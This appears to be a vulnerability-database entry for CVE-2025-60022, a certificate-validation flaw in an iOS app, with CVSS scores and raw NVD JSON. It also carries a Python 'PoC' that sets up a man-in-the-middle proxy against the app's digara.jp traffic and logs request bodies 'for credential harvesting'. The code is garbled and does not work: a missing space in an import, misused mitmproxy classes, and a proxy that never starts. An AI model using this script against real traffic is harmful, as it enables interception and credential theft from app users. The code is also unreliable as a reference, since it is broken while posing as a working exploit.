Security Vulnerability Report
中文
CVE-2025-60022 CVSS 4.8 MEDIUM

CVE-2025-60022

Published: 2025-11-17 06:15:45
Last Modified: 2026-04-15 00:35:42

Description

Improper certificate validation vulnerability exists in 'デジラアプリ' App for iOS prior to ver.80.10.00. If this vulnerability is exploited, a man-in-the-middle attack may allow an attacker to eavesdrop on and/or tamper with an encrypted communication.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

iOS版 デジラアプリ < 80.10.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-60022 PoC - MITM Proxy for Vulnerable App # This PoC demonstrates how an attacker could intercept traffic # from iOS Digara App with improper certificate validation import ssl import socket importmitmproxy from mitmproxy import proxy, options from mitmproxy.proxy.server import ProxyServer import logging logging.basicConfig(level=logging.INFO) logger = logging.getLogger(__name__) class CVE202560022Handler: def __init__(self): self.cert_file = "/path/to/malicious_cert.pem" self.key_file = "/path/to/malicious_key.pem" def request(self, flow): """Intercept and potentially modify HTTP/HTTPS requests""" if flow.request.pretty_host.endswith('digara.jp'): logger.info(f"Intercepted request to: {flow.request.pretty_url}") logger.info(f"Headers: {flow.request.headers}") # Log request body for credential harvesting if flow.request.content: logger.info(f"Request body: {flow.request.content}") def response(self, flow): """Intercept and potentially modify responses""" if flow.request.pretty_host.endswith('digara.jp'): logger.info(f"Intercepted response from: {flow.request.pretty_url}") # Could modify response data here def run_proxy(): """Run MITM proxy with self-signed certificate""" opts = options.Options(listen_host='0.0.0.0', listen_port=8080) # Configure SSL with self-signed certificate # Since app doesn't validate certificates properly, # this will be accepted config = proxy.ProxyConfig( ssl_insecure=True, # Accept invalid certificates certs=[(b'digara.jp', open('digara_cert.pem', 'rb').read())] ) opts.add_option("ssl_insecure", bool, True) proxy_server = ProxyServer(opts) reactor = proxy.ProxyServer(opts) logger.info("MITM Proxy started on port 8080") logger.info("Waiting for connections from vulnerable app...") if __name__ == "__main__": # Note: This is for educational/security research purposes only print("CVE-2025-60022 MITM Attack Simulation") print("WARNING: Unauthorized interception is illegal!") run_proxy()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60022", "sourceIdentifier": "[email protected]", "published": "2025-11-17T06:15:44.643", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper certificate validation vulnerability exists in 'デジラアプリ' App for iOS prior to ver.80.10.00. If this vulnerability is exploited, a man-in-the-middle attack may allow an attacker to eavesdrop on and/or tamper with an encrypted communication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN54005037/", "source": "[email protected]"}]}}